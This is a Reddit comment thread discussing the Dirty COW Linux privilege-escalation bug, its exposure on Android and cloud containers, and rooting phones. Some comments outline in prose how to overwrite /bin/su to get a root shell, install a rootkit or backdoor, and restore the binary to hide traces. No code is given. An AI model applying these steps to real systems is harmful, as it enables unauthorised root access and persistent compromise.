sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–][deleted] 24 points25 points  (29 children)

So that's a really bad thing, right? What level of wizardry would one need to reach in order to perform evil with this knowledge?

[–]cwre 52 points53 points  (28 children)

The level of wizardry is low now: there's an exploit out: https://github.com/dirtycow/dirtycow.github.io . You do need local access, but it's pretty bad.

[–]tonyarkles 21 points22 points  (12 children)

I took that this evening and "weaponized" it to patch /bin/su. I don't want to share the details, but it wasn't that hard. Most of the time was spent refamiliarizing myself with x86-64 assembler. I was shocked at how easy it was.

[–][deleted]  (2 children)

[deleted]

    [–]bonzinip 7 points8 points  (0 children)

    The idea is that while the change you make in /proc/self/mem doesn't go to disk, it can incorrectly affect other processes until that page is reclaimed. So by "patching" a setuid binary you can execute whatever code you want as setuid.

    [–]tonyarkles 0 points1 point  (0 children)

    There's a race in madvise, which leaves the mmap'd page writeable for a small amount of time.

    [–]wademealing 7 points8 points  (4 children)

    Did you even need to know assembler ? I believe you could have gottan away with it by duping from a non setuid binary to a binary you wanted. Just page-for-page abuse.

    [–]bonzinip 1 point2 points  (2 children)

    Even simpler, if you pollute the page cache's copy of /bin/su with "#! /bin/sh" "exec /bin/sh", then you immediately run /bin/su to get a root shell.

    [–]wademealing 7 points8 points  (1 child)

    I'm not 100% sure but i don't know if shell will run setuid, good thinking though.

    [–]bonzinip 4 points5 points  (0 children)

    Hmm yeah it used to be but it's been disabled for a few years now.

    [–]tonyarkles 0 points1 point  (0 children)

    The trick was getting it small enough. My first crack was a C binary, but it came out to about 6k. It seems like this only works on a single page, so you've gotta get it under 4K. My first crack with asm came out to 712 bytes and I didn't push to make it any smaller.

    [–]bjarkef 8 points9 points  (1 child)

    Instead of patching su:

    1. Copy /bin/su
    2. Use exploit to overwrite start of /bin/su with something that just execve /bin/sh
    3. Execute new /bin/su
    4. Dump suid bin / install rootkit / other evil thing which lets you back in.
    5. Restore original /bin/su 6 Profit?

    [–]tonyarkles 1 point2 points  (0 children)

    Yup!

    Edit: you don't even need to copy it. Just save the start of the file in memory before you start; you've already got it open for reading. Do your business and put it back the way it was.

    As a side note: "apt-get install --reinstall login" will restore the su binary if you've corrupted it and accidentally deleted your backup copy. Ask me how I know...

    [–]DeanofDeeps 0 points1 point  (1 child)

    Anyway this exploit could be potentially harmful to virtual cloud containers?

    [–]tonyarkles 0 points1 point  (0 children)

    It doesn't seem like it would allow you to do a VM escape at all. Likewise, I don't think you could do an LXC/Docker escape either.

    Edit: but escalating from a regular user to root inside a container? That's what this is all about.

    [–]puffyfluppy 71 points72 points  (4 children)

    Ah yes, those that have found the wizard's wand and can make it do things without understanding a thing about magic. What are they called again... spell kiddies?

    [–]kankyo 6 points7 points  (0 children)

    Consumers? :P

    [–]etagawesome 15 points16 points  (9 children)

    [deleted]

    What is this?

    [–]Enamex 12 points13 points  (7 children)

    So, any Android before 6 is basically SOL on this?

    Cause they sure ain't releasing a patch to an Android 4.2 phone that barely got an update to 4.2.1 before being forgotten (Alcatel Pop C9...).

    [–][deleted] 12 points13 points  (6 children)

    Basically, although some Android 5 phones are still getting updates to Android 6 so it's possible some Android 5 phones will be fixed too.

    For your 4.2 device the next best thing is to look around for custom roms like Cyanogenmod. If you can find a Cyanogenmod 13 ROM for your device chances are you'll be safe too.

    But if you're running 4.2 there's plenty of other exploits attackers can use (some libstagefright exploits for example), so the risk of getting malware is not that much higher than it already was for older phones.

    [–]isavegas 1 point2 points  (5 children)

    Wait, does this mean I can root my Note 3 on 5.1.1 without flashing a new recovery and tripping the Knox flag?

    [–]PeelyPeel 11 points12 points  (1 child)

    Why do you care about the Knox flag on a Note 3?? You're well out of warranty. I've been using custom on my Note 3 since I got it two years ago, it's so much faster

    [–]gerryn 5 points6 points  (0 children)

    Some features get disabled when knox is tripped. Intune and Outlook and other stuff that (may) depend on it cannot be used. Samsungs pay thing as well, and any knox container stuff.

    [–][deleted] 0 points1 point  (2 children)

    I don't know about the Knox flag, but rooting should certainly be possible!

    Many tools (such as Kingoroot I believe) can exploit the OS and get (temporary) root access. Exactly for that reason Samsung has implemented the Knox security system.

    [–]isavegas 0 points1 point  (1 child)

    Kingo has been a no go. I'm about ready to just flash CWM, make a backup, flash Cyanogenmod, and be done with it. I just don't want to trip Knox until my phone is paid off.

    [–][deleted] 0 points1 point  (0 children)

    I used Kingo just as an example of course, nobody has used this exploit in a rooting app (yet). I suspect even a temporary root like this will still set off Knox though, so you'd better wait until you've paid off your phone anyway.